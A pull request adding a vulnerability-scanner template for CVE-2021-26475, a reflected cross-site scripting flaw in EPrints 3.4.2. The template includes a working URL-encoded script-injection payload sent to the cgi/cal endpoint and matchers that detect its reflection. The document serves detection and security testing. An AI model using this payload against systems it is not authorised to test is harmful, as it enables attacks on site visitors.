### PR TITLE
Create CVE-2021-26475.yaml

### DIFF
--- a/cves/2021/CVE-2021-26475.yaml
+++ b/cves/2021/CVE-2021-26475.yaml
@@ -1,0 +1,24 @@
+id: CVE-2021-26475
+
+info:
+  name: EPrints 3.4.2 XSS
+  author: geeknik
+  description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI.
+  reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
+  severity: medium
+  tags: cve,cve2021,xss,eprints
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</title><script>alert('{{randstr}}')</script>"
+      - type: word
+        part: header
+        words:
+          - "text/html"


### PR DESCRIPTION
### Template / PR Information
- Adds CVE-2021-26475
- EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI.
- https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO
